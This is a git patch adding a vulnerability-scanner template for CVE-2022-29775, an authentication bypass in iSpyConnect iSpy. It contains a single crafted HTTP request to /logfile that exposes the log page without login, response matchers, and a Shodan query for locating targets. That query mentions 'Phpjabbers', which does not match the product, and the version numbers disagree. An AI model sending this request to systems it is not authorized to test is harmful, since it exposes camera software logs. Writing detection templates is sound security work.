From 09e231adddfabed7eaa23d8fe779058671e01ed3 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Thu, 15 Sep 2022 00:01:24 +0530 Subject: [PATCH] Create CVE-2022-29775.yaml --- cves/2022/CVE-2022-29775.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2022/CVE-2022-29775.yaml diff --git a/cves/2022/CVE-2022-29775.yaml b/cves/2022/CVE-2022-29775.yaml new file mode 100644 index 0000000000..fba79398a9 --- /dev/null +++ b/cves/2022/CVE-2022-29775.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-29775 + +info: + name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication. + author: arafatansari + severity: critical + description: | + iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29775 + - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf + metadata: + shodan-query: http.html:"Phpjabbers" + verified: true + tags: improper,authentication,cve,2022 + +requests: + - raw: + - | + GET /logfile?d=crossdomain.xml HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'Log File' + - 'iSpy v7.2.1.0 Log File'